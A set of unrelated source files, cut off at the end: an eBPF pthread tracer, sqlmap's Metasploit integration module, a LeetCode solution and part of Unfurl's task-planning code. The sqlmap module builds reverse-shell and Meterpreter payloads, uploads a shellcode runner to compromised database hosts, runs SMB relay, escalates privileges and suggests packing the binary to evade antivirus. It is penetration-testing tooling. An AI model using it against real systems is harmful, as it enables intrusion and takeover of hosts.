#include <linux/sched.h>
struct data_t {
u64 ts;
u32 pid;
u64 start;
char comm[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(events);
void do_entry(struct pt_regs *ctx) {
struct data_t data = {};
data.ts = bpf_ktime_get_ns();
data.pid = bpf_get_current_pid_tgid() >> 32;
data.start = PT_REGS_PARM3(ctx);
bpf_get_current_comm(&data.comm, sizeof(data.comm));
events.perf_submit(ctx, &data, sizeof(data));
};
""")
b.attach_uprobe(name="pthread", sym="pthread_create", fn_name="do_entry")
print("%-10s %-6s %-16s %s" % ("TIME(ms)", "PID", "COMM", "FUNC"))
start_ts = 0
# process event
def print_event(cpu, data, size):
global start_ts
event = b["events"].event(data)
if start_ts == 0:
start_ts = event.ts
func = b.sym(event.start, event.pid)
if (func == "[unknown]"):
func = hex(event.start)
print("%-10d %-6d %-16s %s" % ((event.ts - start_ts) / 1000000,
event.pid, event.comm, func))
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
the-stack_106_16985
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import select
import sys
import tempfile
import time
from subprocess import PIPE
from extra.cloak.cloak import cloak
from extra.cloak.cloak import decloak
from lib.core.common import dataToStdout
from lib.core.common import Backend
from lib.core.common import getLocalIP
from lib.core.common import getRemoteIP
from lib.core.common import getUnicode
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import pollProcess
from lib.core.common import randomRange
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.settings import IS_WIN
from lib.core.settings import METASPLOIT_SESSION_TIMEOUT
from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER
from lib.core.settings import UNICODE_ENCODING
from lib.core.subprocessng import blockingReadFromFD
from lib.core.subprocessng import blockingWriteToFD
from lib.core.subprocessng import Popen as execute
from lib.core.subprocessng import send_all
from lib.core.subprocessng import recv_some
if IS_WIN:
import msvcrt
class Metasploit:
"""
This class defines methods to call Metasploit for plugins.
"""
def _initVars(self):
self.connectionStr = None
self.lhostStr = None
self.rhostStr = None
self.portStr = None
self.payloadStr = None
self.encoderStr = None
self.payloadConnStr = None
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP() or conf.hostname
self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))
if IS_WIN:
_ = conf.msfPath
while _:
if os.path.exists(os.path.join(_, "scripts")):
_ = os.path.join(_, "scripts", "setenv.bat")
break
else:
old = _
_ = normalizePath(os.path.join(_, ".."))
if _ == old:
break
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
self._msfEncode = "ruby %s" % self._msfEncode
self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
self._msfPayloadsList = {
"windows": {
1: ("Meterpreter (default)", "windows/meterpreter"),
2: ("Shell", "windows/shell"),
3: ("VNC", "windows/vncinject"),
},
"linux": {
1: ("Shell (default)", "linux/x86/shell"),
2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
}
}
self._msfConnectionsList = {
"windows": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
},
"linux": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
}
}
self._msfEncodersList = {
"windows": {
1: ("No Encoder", "generic/none"),
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
9: ("Non-Alpha Encoder", "x86/nonalpha"),
10: ("Non-Upper Encoder", "x86/nonupper"),
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
}
}
self._msfSMBPortsList = {
"windows": {
1: ("139/TCP", "139"),
2: ("445/TCP (default)", "445"),
}
}
self._portData = {
"bind": "remote port number",
"reverse": "local port number",
}
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS):
opSys = "windows"
else:
opSys = "linux"
message = "which %s do you want to use?" % msg
if lst:
for num, data in lst[opSys].items():
description = data[0]
if num > maxValue:
maxValue = num
if "(default)" in description:
default = num
message += "\n[%d] %s" % (num, description)
else:
message += " [%d] " % default
choice = readInput(message, default="%d" % default)
if not choice:
if lst:
choice = getUnicode(default, UNICODE_ENCODING)
else:
return default
elif not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
return self._skeletonSelection(msg, lst, maxValue, default)
elif int(choice) > maxValue or int(choice) < 1:
logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
return self._skeletonSelection(msg, lst, maxValue, default)
choice = int(choice)
if lst:
choice = lst[opSys][choice][1]
return choice
def _selectSMBPort(self):
return self._skeletonSelection("SMB port", self._msfSMBPortsList)
def _selectEncoder(self, encode=True):
# This is always the case except for --os-bof where the user can
# choose which encoder to use. When called from --os-pwn the encoder
# is always x86/alpha_mixed - used for sys_bineval() and
# shellcodeexec
if isinstance(encode, basestring):
return encode
elif encode:
return self._skeletonSelection("payload encoding", self._msfEncodersList)
def _selectPayload(self):
if Backend.isOs(OS.WINDOWS) and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can be used to "
infoMsg += "escalate privileges via 'incognito' extension, "
infoMsg += "'getsystem' command or post modules"
logger.info(infoMsg)
_payloadStr = "windows/meterpreter"
else:
_payloadStr = self._skeletonSelection("payload", self._msfPayloadsList)
if _payloadStr == "windows/vncinject":
choose = False
if Backend.isDbms(DBMS.MYSQL):
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, it is likely that the the VNC "
debugMsg += "injection will be successful"
logger.debug(debugMsg)
elif Backend.isDbms(DBMS.PGSQL):
choose = True
warnMsg = "by default PostgreSQL on Windows runs as "
warnMsg += "postgres user, it is unlikely that the VNC "
warnMsg += "injection will be successful"
logger.warn(warnMsg)
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
choose = True
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg += "successful because usually Microsoft SQL Server "
warnMsg += "%s runs as Network Service " % Backend.getVersion()
warnMsg += "or the Administrator is not logged in"
logger.warn(warnMsg)
if choose:
message = "what do you want to do?\n"
message += "[1] Give it a try anyway\n"
message += "[2] Fall back to Meterpreter payload (default)\n"
message += "[3] Fall back to Shell payload"
while True:
choice = readInput(message, default="2")
if not choice or choice == "2":
_payloadStr = "windows/meterpreter"
break
elif choice == "3":
_payloadStr = "windows/shell"
break
elif choice == "1":
if Backend.isDbms(DBMS.PGSQL):
logger.warn("beware that the VNC injection might not work")
break
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
break
elif not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > 2:
logger.warn("invalid value, it must be 1 or 2")
if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter":
warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "")
warnMsg += "with the Meterpreter payload. Falling back to "
warnMsg += "reverse TCP"
logger.warn(warnMsg)
self.connectionStr = "reverse_tcp"
return _payloadStr
def _selectPort(self):
for connType, connStr in self._portData.items():
if self.connectionStr.startswith(connType):
return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))
def _selectRhost(self):
if self.connectionStr.startswith("bind"):
message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP
address = readInput(message, default=self.remoteIP)
if not address:
address = self.remoteIP
return address
elif self.connectionStr.startswith("reverse"):
return None
else:
raise SqlmapDataException("unexpected connection type")
def _selectLhost(self):
if self.connectionStr.startswith("reverse"):
message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP
address = readInput(message, default=self.localIP)
if not address:
address = self.localIP
return address
elif self.connectionStr.startswith("bind"):
return None
else:
raise SqlmapDataException("unexpected connection type")
def _selectConnection(self):
return self._skeletonSelection("connection type", self._msfConnectionsList)
def _prepareIngredients(self, encode=True):
self.connectionStr = self._selectConnection()
self.lhostStr = self._selectLhost()
self.rhostStr = self._selectRhost()
self.portStr = self._selectPort()
self.payloadStr = self._selectPayload()
self.encoderStr = self._selectEncoder(encode)
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
def _forgeMsfCliCmd(self, exitfunc="process"):
if kb.oldMsf:
self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self._cliCmd += " EXITFUNC=%s" % exitfunc
self._cliCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("bind"):
self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += " LHOST=%s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
self._cliCmd += " DisableCourtesyShell=true"
self._cliCmd += " E"
else:
self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
self._cliCmd += "; set EXITFUNC %s" % exitfunc
self._cliCmd += "; set LPORT %s" % self.portStr
if self.connectionStr.startswith("bind"):
self._cliCmd += "; set RHOST %s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += "; set LHOST %s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
self._cliCmd += "; set DisableCourtesyShell true"
self._cliCmd += "; exploit'"
def _forgeMsfCliCmdForSmbrelay(self):
self._prepareIngredients(encode=False)
if kb.oldMsf:
self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self._cliCmd += " EXITFUNC=thread"
self._cliCmd += " LPORT=%s" % self.portStr
self._cliCmd += " SRVHOST=%s" % self.lhostStr
self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
if self.connectionStr.startswith("bind"):
self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += " LHOST=%s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
self._cliCmd += " E"
else:
self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
self._cliCmd += "; set EXITFUNC thread"
self._cliCmd += "; set LPORT %s" % self.portStr
self._cliCmd += "; set SRVHOST %s" % self.lhostStr
self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort()
if self.connectionStr.startswith("bind"):
self._cliCmd += "; set RHOST %s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += "; set LHOST %s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
self._cliCmd += "; exploit'"
def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
if kb.oldMsf:
self._payloadCmd = self._msfPayload
else:
self._payloadCmd = "%s -p" % self._msfVenom
self._payloadCmd += " %s" % self.payloadConnStr
self._payloadCmd += " EXITFUNC=%s" % exitfunc
self._payloadCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("reverse"):
self._payloadCmd += " LHOST=%s" % self.lhostStr
elif not self.connectionStr.startswith("bind"):
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.LINUX) and conf.privEsc:
self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
if kb.oldMsf:
if extra == "BufferRegister=EAX":
self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
if extra is not None:
self._payloadCmd += " %s" % extra
else:
self._payloadCmd += " X > \"%s\"" % outFile
else:
if extra == "BufferRegister=EAX":
self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)
if extra is not None:
self._payloadCmd += " %s" % extra
self._payloadCmd += " > \"%s\"" % outFile
else:
self._payloadCmd += " -f exe > \"%s\"" % outFile
def _runMsfCliSmbrelay(self):
self._forgeMsfCliCmdForSmbrelay()
infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
logger.debug("executing local command: %s" % self._cliCmd)
self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)
def _runMsfCli(self, exitfunc):
self._forgeMsfCliCmd(exitfunc)
infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
logger.debug("executing local command: %s" % self._cliCmd)
self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)
def _runMsfShellcodeRemote(self):
infoMsg = "running Metasploit Framework shellcode "
infoMsg += "remotely via UDF 'sys_bineval', please wait.."
logger.info(infoMsg)
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def _runMsfShellcodeRemoteViaSexec(self):
infoMsg = "running Metasploit Framework shellcode remotely "
infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg)
if not Backend.isOs(OS.WINDOWS):
self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True)
cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
else:
cmd = "\"%s\" %s" % (self.shellcodeexecRemote, self.shellcodeString)
self.execCmd(cmd, silent=True)
def _loadMetExtensions(self, proc, metSess):
if not Backend.isOs(OS.WINDOWS):
return
send_all(proc, "use espia\n")
send_all(proc, "use incognito\n")
# This extension is loaded by default since Metasploit > 3.7
#send_all(proc, "use priv\n")
# This extension freezes the connection on 64-bit systems
#send_all(proc, "use sniffer\n")
send_all(proc, "sysinfo\n")
send_all(proc, "getuid\n")
if conf.privEsc:
print
infoMsg = "trying to escalate privileges using Meterpreter "
infoMsg += "'getsystem' command which tries different "
infoMsg += "techniques, including kitrap0d"
logger.info(infoMsg)
send_all(proc, "getsystem\n")
infoMsg = "displaying the list of Access Tokens availables. "
infoMsg += "Choose which user you want to impersonate by "
infoMsg += "using incognito's command 'impersonate_token' if "
infoMsg += "'getsystem' does not success to elevate privileges"
logger.info(infoMsg)
send_all(proc, "list_tokens -u\n")
send_all(proc, "getuid\n")
def _controlMsfCmd(self, proc, func):
initialized = False
start_time = time.time()
stdin_fd = sys.stdin.fileno()
while True:
returncode = proc.poll()
if returncode is None:
# Child hasn't exited yet
pass
else:
logger.debug("connection closed properly")
return returncode
try:
if IS_WIN:
timeout = 3
inp = ""
_ = time.time()
while True:
if msvcrt.kbhit():
char = msvcrt.getche()
if ord(char) == 13: # enter_key
break
elif ord(char) >= 32: # space_char
inp += char
if len(inp) == 0 and (time.time() - _) > timeout:
break
if len(inp) > 0:
try:
send_all(proc, inp)
except (EOFError, IOError):
# Probably the child has exited
pass
else:
ready_fds = select.select([stdin_fd], [], [], 1)
if stdin_fd in ready_fds[0]:
try:
send_all(proc, blockingReadFromFD(stdin_fd))
except (EOFError, IOError):
# Probably the child has exited
pass
out = recv_some(proc, t=.1, e=0)
blockingWriteToFD(sys.stdout.fileno(), out)
# For --os-pwn and --os-bof
pwnBofCond = self.connectionStr.startswith("reverse")
pwnBofCond &= "Starting the payload handler" in out
# For --os-smbrelay
smbRelayCond = "Server started" in out
if pwnBofCond or smbRelayCond:
func()
timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT
if not initialized:
match = re.search("Meterpreter session ([\d]+) opened", out)
if match:
self._loadMetExtensions(proc, match.group(1))
if "shell" in self.payloadStr:
send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n")
time.sleep(2)
initialized = True
elif timeout:
proc.kill()
errMsg = "timeout occurred while attempting "
errMsg += "to open a remote session"
raise SqlmapGenericException(errMsg)
if conf.liveTest and timeout:
if initialized:
send_all(proc, "exit\n")
time.sleep(2)
else:
proc.kill()
except (EOFError, IOError, select.error):
return proc.returncode
def createMsfShellcode(self, exitfunc, format, extra, encode):
infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self._randStr = randomStr(lowercase=True)
self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)
Metasploit._initVars(self)
self._prepareIngredients(encode=encode)
self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)
logger.debug("executing local command: %s" % self._payloadCmd)
process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr)
if match:
payloadSize = int(match.group(2))
if extra == "BufferRegister=EAX":
payloadSize = payloadSize / 2
debugMsg = "the shellcode size is %d bytes" % payloadSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "")
raise SqlmapFilePathException(errMsg)
self._shellcodeFP = open(self._shellcodeFilePath, "rb")
self.shellcodeString = self._shellcodeFP.read()
self._shellcodeFP.close()
os.unlink(self._shellcodeFilePath)
def uploadShellcodeexec(self, web=False):
self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec")
if Backend.isOs(OS.WINDOWS):
self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32")
content = decloak(self.shellcodeexecLocal)
if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:
content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))
_ = cloak(data=content)
handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32")
os.close(handle)
with open(self.shellcodeexecLocal, "w+b") as f:
f.write(_)
else:
self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch())
__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename)
self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal)
else:
written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
if written is not True:
errMsg = "there has been a problem uploading shellcodeexec, it "
errMsg += "looks like the binary file has not been written "
errMsg += "on the database underlying file system or an AV has "
errMsg += "flagged it as malicious and removed it. In such a case "
errMsg += "it is recommended to recompile shellcodeexec with "
errMsg += "slight modification to the source code or pack it "
errMsg += "with an obfuscator software"
logger.error(errMsg)
return False
else:
logger.info("shellcodeexec successfully uploaded")
return True
def pwn(self, goUdf=False):
if goUdf:
exitfunc = "thread"
func = self._runMsfShellcodeRemote
else:
exitfunc = "process"
func = self._runMsfShellcodeRemoteViaSexec
self._runMsfCli(exitfunc=exitfunc)
if self.connectionStr.startswith("bind"):
func()
debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func)
logger.debug(debugMsg)
if not goUdf:
time.sleep(1)
self.delRemoteFile(self.shellcodeexecRemote)
def smb(self):
Metasploit._initVars(self)
self._randFile = "tmpu%s.txt" % randomStr(lowercase=True)
self._runMsfCliSmbrelay()
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile)
else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile)
debugMsg = "Metasploit Framework console exited with return "
debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest)
logger.debug(debugMsg)
def bof(self):
self._runMsfCli(exitfunc="seh")
if self.connectionStr.startswith("bind"):
self.spHeapOverflow()
debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
logger.debug(debugMsg)
|
the-stack_106_16986
|
class Solution:
def maxValue(self, events: List[List[int]], k: int) -> int:
e = sorted(events)
@lru_cache(None)
def dp(i, k):
if k == 0 or i == len(e):
return 0
# binary search events to find the first index j s.t. e[j][0] > e[i][1]
j = bisect.bisect(e, [e[i][1], math.inf, math.inf], i + 1)
return max(dp(i + 1, k), e[i][2] + dp(j, k - 1))
return dp(0, k)
|
the-stack_106_16987
|
# Copyright (c) 2021 Adam Souzis
# SPDX-License-Identifier: MIT
import collections
import re
import six
import shlex
from .util import (
lookup_class,
load_module,
find_schema_errors,
UnfurlError,
UnfurlTaskError,
)
from .result import serialize_value
from .support import Defaults
import logging
logger = logging.getLogger("unfurl")
# we want ConfigurationSpec to be standalone and easily serializable
class ConfigurationSpec:
@classmethod
def getDefaults(cls):
return dict(
className=None,
majorVersion=0,
minorVersion="",
workflow=Defaults.workflow,
timeout=None,
operation_host=None,
environment=None,
inputs=None,
inputSchema=None,
preConditions=None,
postConditions=None,
primary=None,
dependencies=None,
outputs=None,
interface=None,
)
def __init__(
self,
name,
operation,
className=None,
majorVersion=0,
minorVersion="",
workflow=Defaults.workflow,
timeout=None,
operation_host=None,
environment=None,
inputs=None,
inputSchema=None,
preConditions=None,
postConditions=None,
primary=None,
dependencies=None,
outputs=None,
interface=None,
):
assert name and className, "missing required arguments"
self.name = name
self.operation = operation
self.className = className
self.majorVersion = majorVersion
self.minorVersion = minorVersion
self.workflow = workflow
self.timeout = timeout
self.operation_host = operation_host
self.environment = environment
self.inputs = inputs or {}
self.inputSchema = inputSchema
self.outputs = outputs or {}
self.preConditions = preConditions
self.postConditions = postConditions
self.artifact = primary
self.dependencies = dependencies
self.interface = interface
def find_invalidate_inputs(self, inputs):
if not self.inputSchema:
return []
return find_schema_errors(serialize_value(inputs), self.inputSchema)
# XXX same for postConditions
def find_invalid_preconditions(self, target):
if not self.preConditions:
return []
# XXX this should be like a Dependency object
expanded = serialize_value(target.attributes)
return find_schema_errors(expanded, self.preConditions)
def create(self):
klass = lookup_class(self.className)
if not klass:
raise UnfurlError(f"Could not load configurator {self.className}")
else:
return klass(self)
def should_run(self):
return Defaults.shouldRun
def copy(self, **mods):
args = self.__dict__.copy()
args.update(mods)
return ConfigurationSpec(**args)
def __eq__(self, other):
if not isinstance(other, ConfigurationSpec):
return False
return (
self.name == other.name
and self.operation == other.operation
and self.className == other.className
and self.majorVersion == other.majorVersion
and self.minorVersion == other.minorVersion
and self.workflow == other.workflow
and self.timeout == other.timeout
and self.environment == other.environment
and self.inputs == other.inputs
and self.inputSchema == other.inputSchema
and self.outputs == other.outputs
and self.preConditions == other.preConditions
and self.postConditions == other.postConditions
and self.interface == other.interface
)
class PlanRequest:
error = None
future_dependencies = ()
task = None
def __init__(self, target):
self.target = target
@property
def root(self):
return self.target.root if self.target else None
def update_future_dependencies(self, completed):
return self.future_dependencies
def get_operation_artifacts(self):
return []
class TaskRequest(PlanRequest):
"""
Yield this to run a child task. (see :py:meth:`unfurl.configurator.TaskView.create_sub_task`)
"""
def __init__(
self,
configSpec,
target,
reason,
persist=False,
required=None,
startState=None,
):
super().__init__(target)
self.configSpec = configSpec
self.reason = reason
self.persist = persist
self.required = required
self.error = configSpec.name == "#error"
self.startState = startState
self.task = None
def _get_artifact_plan(self, artifact):
# the artifact has an interface so it needs to be installed on the operation_host
if artifact and artifact.get_interfaces():
# the same global artifact can have different local names when declared on a node template
# but are uniquely identified by (file, repository) so use that to generate a unique node template name
name = "__artifact__" + artifact.get_name_from_artifact_spec(
artifact.as_import_spec()
)
operation_host = (
find_operation_host(self.target, self.configSpec.operation_host)
or self.target.root
)
existing = operation_host.root.find_instance(name)
if existing:
if existing.operational:
return None
else:
return JobRequest([existing])
else:
if not operation_host.template.spec.get_template(name):
# template isn't defined, define inline
artifact_tpl = artifact.toscaEntityTemplate.entity_tpl
template = dict(
name=name,
directives=["protected"],
type="unfurl.nodes.ArtifactInstaller",
artifacts={"install": artifact_tpl},
)
artifact_type = artifact_tpl["type"]
if (
artifact_type
not in operation_host.template.spec.template.topology_template.custom_defs
):
# operation_host must be in an external ensemble that doesn't have the type def
artifact_type_def = self.target.template.spec.template.topology_template.custom_defs[
artifact_type
]
template["custom_types"] = {artifact_type: artifact_type_def}
else:
template = name
return JobRequest(
[operation_host],
update=dict(
name=name,
parent=operation_host.name,
template=template,
attributes=artifact.properties,
),
)
return None
def get_operation_artifacts(self):
artifacts = []
if self.configSpec.dependencies:
for artifact in self.configSpec.dependencies:
jobRequest = self._get_artifact_plan(artifact)
if jobRequest:
artifacts.append(jobRequest)
jobRequest = self._get_artifact_plan(self.configSpec.artifact)
if jobRequest:
artifacts.append(jobRequest)
return artifacts
@property
def name(self):
if self.configSpec.operation:
name = self.configSpec.operation
else:
name = self.configSpec.name
if self.reason and self.reason not in name:
return name + " (reason: " + self.reason + ")"
return name
def update_future_dependencies(self, completed):
self.future_dependencies = [
fr for fr in self.future_dependencies if fr not in completed
]
return self.future_dependencies
def _summary_dict(self, include_rendered=True):
summary = dict(
operation=self.configSpec.operation or self.configSpec.name,
reason=self.reason,
)
rendered = {}
if self.task and self.task._workFolders:
for name, wf in self.task._workFolders.items():
rendered[name] = wf.cwd
if include_rendered:
summary["rendered"] = rendered
return summary
def __repr__(self):
state = " " + (self.target.state and self.target.state.name or "")
return (
f"TaskRequest({self.target}({self.target.status.name}{state}):{self.name})"
)
class SetStateRequest(PlanRequest):
def __init__(self, target, state):
super().__init__(target)
self.set_state = state
@property
def name(self):
return self.set_state
def _summary_dict(self):
return dict(set_state=self.set_state)
class TaskRequestGroup(PlanRequest):
def __init__(self, target, workflow):
super().__init__(target)
self.workflow = workflow
self.children = []
@property
def future_dependencies(self):
future_dependencies = []
for req in self.children:
future_dependencies.extend(req.future_dependencies)
return future_dependencies
def update_future_dependencies(self, completed):
future_dependencies = []
for req in self.children:
future_dependencies.extend(req.update_future_dependencies(completed))
return future_dependencies
def get_operation_artifacts(self):
artifacts = []
for req in self.children:
artifacts.extend(req.get_operation_artifacts())
return artifacts
def __repr__(self):
return f"TaskRequestGroup({self.target}:{self.workflow}:{self.children})"
class JobRequest:
"""
Yield this to run a child job.
"""
def __init__(self, resources, errors=None, update=None):
self.instances = resources
self.errors = errors or []
self.update = update
def get_instance_specs(self):
if self.update:
return [self.update]
else:
return [r.name for r in self.instances]
@property
def name(self):
if self.update:
return self.update["name"]
elif self.instances:
return self.instances[0].name
else:
return ""
@property
def target(self):
# XXX replace instances with target
if self.instances:
return self.instances[0]
else:
return None
@property
def root(self):
if self.instances:
# all instances need the same root
assert (
len(self.instances) == 1
or len(set(id(i.root) for i in self.instances)) == 1
)
return self.instances[0].root
else:
return None
def __repr__(self):
return f"JobRequest({self.name})"
def find_operation_host(target, operation_host):
# SELF, HOST, ORCHESTRATOR, SOURCE, TARGET
if not operation_host or operation_host in ["localhost", "ORCHESTRATOR"]:
return target.root.find_instance_or_external("localhost")
if operation_host == "SELF":
return target
if operation_host == "HOST":
# XXX should search all ancestors to find parent that can handle the given operation
# e.g. ansible configurator should find ancestor compute node
return target.parent
if operation_host == "SOURCE":
return target.source
if operation_host == "TARGET":
return target.target
return target.root.find_instance_or_external(operation_host)
def get_render_requests(requests):
# returns requests that can be rendered grouped by its top-most task group
for req in requests:
if isinstance(req, TaskRequestGroup):
for parent, child in get_render_requests(req.children):
yield req, child # yields root as parent
elif isinstance(req, TaskRequest):
yield None, req
elif not isinstance(req, SetStateRequest):
assert not req, f"unexpected type of request: {req}"
def _get_deps(parent, req, liveDependencies, requests):
previous = None
for (root, r) in requests:
if req.target.key == r.target.key:
continue # skip self
if req.required is not None and not req.required:
continue # skip requests that aren't going to run
if r.target.key in liveDependencies:
if root:
if previous is root or parent is root:
# only yield root once and
